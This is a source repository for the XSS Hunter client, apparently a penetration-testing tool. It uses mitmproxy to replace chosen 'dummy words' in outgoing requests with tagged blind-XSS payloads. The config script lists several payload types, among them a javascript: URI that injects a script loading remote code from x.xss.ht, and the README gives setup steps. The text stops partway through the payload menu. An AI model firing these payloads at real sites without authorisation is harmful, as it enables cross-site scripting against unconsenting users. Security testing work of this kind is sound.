├── .gitignore
├── requirements.txt
├── README.md
├── generate_config.py
└── mitm_xsshunter.py
/.gitignore:
--------------------------------------------------------------------------------
1 | *~
2 | .*.sw?
3 | *.pyc
4 | *.pyo
5 | .cache
6 | .DS_Store
7 | *.diff
8 | *.patch
9 | *.idea
10 | *.egg-info
11 | .eggs
12 | .coverage
13 | /build
14 | /dist
15 | /dev_packages
16 | /env
17 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | argh==0.26.1
2 | backports-abc==0.4
3 | backports.ssl-match-hostname==3.5.0.1
4 | blinker==1.4
5 | certifi==2016.2.28
6 | cffi==1.5.2
7 | click==6.2
8 | ConfigArgParse==0.10.0
9 | construct==2.5.2
10 | cryptography==1.1.2
11 | enum34==1.1.2
12 | futures==3.0.5
13 | hpack==2.0.1
14 | html2text==2015.11.4
15 | idna==2.0
16 | ipaddress==1.0.16
17 | lxml==3.4.4
18 | mitmproxy==0.15
19 | ndg-httpsclient==0.4.0
20 | netlib==0.15.1
21 | passlib==1.6.5
22 | pathtools==0.1.2
23 | Pillow==3.0.0
24 | pyasn1==0.1.9
25 | pycparser==2.14
26 | pyOpenSSL==0.15.1
27 | pyparsing==2.0.7
28 | pyperclip==1.5.26
29 | PyYAML==3.11
30 | requests==2.9.1
31 | requests-futures==0.9.7
32 | singledispatch==3.4.0.3
33 | six==1.10.0
34 | tornado==4.3
35 | urwid==1.3.1
36 | watchdog==0.8.3
37 | wheel==0.24.0
38 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # XSS Hunter Client
2 |
3 | ## What is the this tool for?
4 | This tool can be used to generate correlated XSS payloads, these payloads are tagged with a unique ID which can be used to track which HTTP request caused which XSS payload to fire. By using this tool all of your injection attempts are tracked and the reports you generate will have the responsible injection attempt included in the final output. This is useful since XSS payloads can often traverse multiple services (and even protocols) before firing, so it's not always clear what injection caused a certain XSS payload to fire.
5 |
6 | ## Setup
7 | 1. Create an XSS Hunter account at https://xsshunter.com/
8 | 2. Create a new virtual environment by running `virtualenv env`
9 | 3. Source the newly created enviroment by running `source env/bin/activate`
10 | 4. Install the required libraries by running `pip install -r requirements.txt`
11 | 5. Run the config generation tool `./generate_config.py` and follow the steps mentioned.
12 | 6. Now run mitmproxy with this client as an inline script: `mitmproxy -s mitm_xsshunter.py -p 1234`
13 | 7. Proxy your browser through this new tool, keep in mind that you may have to [install the mitmproxy certificate authority](http://docs.mitmproxy.org/en/stable/certinstall.html) if you have not done so already.
14 |
15 | ## Using the XSS Hunter Client
16 | Using the client is simple, during the config generation you will set a list of *dummy words*, these are special strings which will be replaced upon being seen by the proxy tool. For example, one rule could have the dummy word be `https://example.com` with the `javascript:` URI payload selected. Once the proxy sees `https://example.com` in the request it will automatically replace it with the `javascript:` URI payload. It is **very important** that you choose a unique dummy word that is unlikely to appear regularly in the request, else you risk scattering your payloads where you don't want them.
17 |
--------------------------------------------------------------------------------
/generate_config.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | import yaml
3 | import os
4 |
5 | def get_payload_id_from_number( number ):
6 | if number == 1:
7 | return "generic_script_tag_payload"
8 | elif number == 2:
9 | return "javascript_uri_payload"
10 | elif number == 3:
11 | return "input_tag_payload"
12 | elif number == 4:
13 | return "image_tag_payload"
14 | elif number == 5:
15 | return "source_tag_payload"
16 | elif number == 6:
17 | return "srcdoc_tag_payload"
18 | elif number == 7:
19 | return "xhr_payload"
20 | elif number == 8:
21 | return "getscript_payload"
22 | else:
23 | return 1
24 |
25 | print( """
26 | Welcome to the XSS Hunter client config generation tool!
27 |
28 | ** How Does It Work? **
29 | The XSS Hunter clients works by replacing pre-specified "dummy words" with XSS correlation payloads.
30 |
31 | Each payload is generated with a unique ID like the following:
32 | https://x.xss.ht/ljsdhu6f84
33 |
34 | Upon the above "tagged" payload firing, the full HTTP request that caused the injection will also be included in the report.
35 | This allows for much better reporting since you have the full details to reproduce the vulnerability.
36 |
37 | ==================
38 | """ )
39 |
40 | keep_going = True
41 | settings = {}
42 | settings["xss_probe_settings"] = {}
43 | while keep_going:
44 | dummy_word = raw_input( "Dummy word: " )
45 | print(
46 | """
47 | Please choose the payload type you'd like to use for this dummy word:
48 | 1) ">
49 | 2) javascript:eval('var a=document.createElement(\'script\');a.src=\'https://x.xss.ht\';document.body.appendChild(a)')
50 | 3) ">
51 | 4) ">
52 | 5) ">